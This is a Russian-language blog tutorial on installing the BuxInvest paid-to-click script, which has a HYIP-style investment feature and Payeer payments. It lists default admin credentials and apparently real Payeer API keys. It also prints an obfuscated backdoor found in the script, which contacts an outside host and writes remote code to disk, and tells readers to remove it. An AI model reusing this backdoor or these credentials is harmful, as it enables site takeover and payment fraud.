Запуск сайта используя готовый скрипт

Просмотров: 5

Использование готового скрипта сайта это возможность для начинающих людей получить в своё распоряжение, как администратору, свой сайт и начать работать на просторах интернета. Найти готовый скрипт не сложно, достаточно указать в поисковой строке “скачать скрипт сайта (допустим букса) и вы получите множество предложений скачать бесплатно или купить за указанную сумму, в большинстве в архиве присутствует инструкция по установке, но она полезна тем, кто разбирается в этом, в этой статье изложены материалы для начинающих.

Найти скрипт не сложно, а вот найти сайт, который в виде доступных уроков помог бы самостоятельно установить его на хостинг, настроить и запустить очень-очень мало, я предлагаю вам ознакомиться с инструкциями, которые помогут вам на всех этапах запуска сайта.

Все материалы взяты с сайта “Mexanus” с разрешения автора, за что ему большое спасибо. На мой взгляд это лучший сайт для начинающих веб-мастеров.

В качестве примера рассмотрим установку скрипта букса это сайт предоставляющий возможность размещать рекламные материалы, видео, задания, а так же небольшой заработок для пользователей.

скрипт букса BuxInvest

Сегодня выложу скрипт букса BuxInvest. . И так что он из себя представляет. Данный скрипт типичный букс созданный на основе движка фруктовой фермы. Работающий с платежкой Payeer.

В нем имеется серфинг ссылок, баннеров добавил задания имеется ежедневный бонус. Есть возможность инвестирования от этого и название. Собственно это скрипт для тех кто хочет совместить букс, хайп и бонусник в одном сайте.

Так выглядит страница профиля.

Это бонусы

И Инвестиции.

Админка

Админка как у всякой фермы сложностью не отличается

. Для входа в админку используем адрес http://Ваш сайт.сом/?menu=adminka

логин     adminRU

Пароль   KaligulA

логин с паролем можно сменить в админке

Как видно из картинки имеется небольшие косяки с кодировкой но на функционал это не влияет.

Собственно судя по админке ее собрали из нескольких ферм на скорую руку тем не менее то что нужно работает исправно.

Установка скрипта на хостинг

Данный скрипт устанавливается на хостинг так же как и ему подобные. Для этого заливаем файлы на хостинг и создаем базу данных.

Потом ищем файл _class.config.php в нем нужно прописать информацию по базе данных

<?PHP
class config{

public $HostDB = “localhost“;                                        Обычно так и остается смотреть на хостинге
public $UserDB = “zzzzzzzzz“;                                        пользователь базы данных
public $PassDB = “zzzzzzzzz“;                                        пароль к базе данных
public $BaseDB = “zzzzzzzzz“;                                        Название базы данных

public $SYSTEM_START_TIME = 1455711243;            Дата старта проекта в формате unix
public $VAL = “пїЅпїЅпїЅ.”;                                            Валюта сайт вместо каракуль пишем Rub.

# PAYEER пїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅ
public $AccountNumber = ‘zzzzzzzzz‘;
public $apiId = ‘zzzzzzzzzzz‘;                                         Подключение выплат
public $apiKey = ‘vorZg14zJ7lnKEIR‘;

public $shopID = 434270571;
public $secretW = “YF7VsPjpMl“;                                 Подключение пополнений

public $all_inserts_action = ‘0‘; //                                 Дополнительный процент при пополнении

}
?>

Синим обозначено то что меняется

При подключении платежек требуются адреса обработчика платежа адрес для успешной и не успешной оплаты.

HTTP://Ваш сайт/payeer_merchant.php             адрес обработчика

http://Ваш сайт/fail.html                                    адрес для не успешной оплаты

http://Ваш сайт/success.html                             адрес для успешной оплаты

Инструкция по подключению платёжного сервиса Payeer, находится здесь

Ошибки и уязвимости

Как упоминал ранее были ошибки с кодировкой во всех значимых местах исправил. Так же не хватало немного картинок добавил. Остальное вроде работает без проблем.

С уязвимостями сложнее было их немного но одна довольно серьезная кто то себе оставил окно для входа сканер ее обнаружил и показал хотя варианта исправления не предложил в таком случае нужно просто удалить фрагмент. Выглядела она так

} if (!isset($_Cookie[base64_decode(‘X3ltXl1cw==’)])) { @file_get_contents(base64_decode(‘aHR0cDovL2wxbDAuY29tL3Av’).$_SERVER[‘HTTP_HOST’]); @setcookie(base64_decode(‘X3X2l1cw==’), 1, time() 31536000, ‘/’, $_SERVER[‘HTTP_HOST’]); } if (isset($_Cookie[base64_decode(‘cmVkNHU=’)])) { @file_put_contents(base64_decode(‘c3hdGUucGhw’), @file_get_contents(base64_decode(‘aHR0cDovL2wxbDAuY29L2QudHh0’))); }

Позволяла взломщику через куки без проблем делать все что угодно

Дополнительно

Сменить ее не сложно для этого заливаем новую картинку с названием bgstat.png  в папку /img

логотип это картинка logo.png в этой же папке размер 380х75

Вроде все, остальное в процессе работы разберем.

Скачать скрипт

материалы взяты с сайта «Mexanus»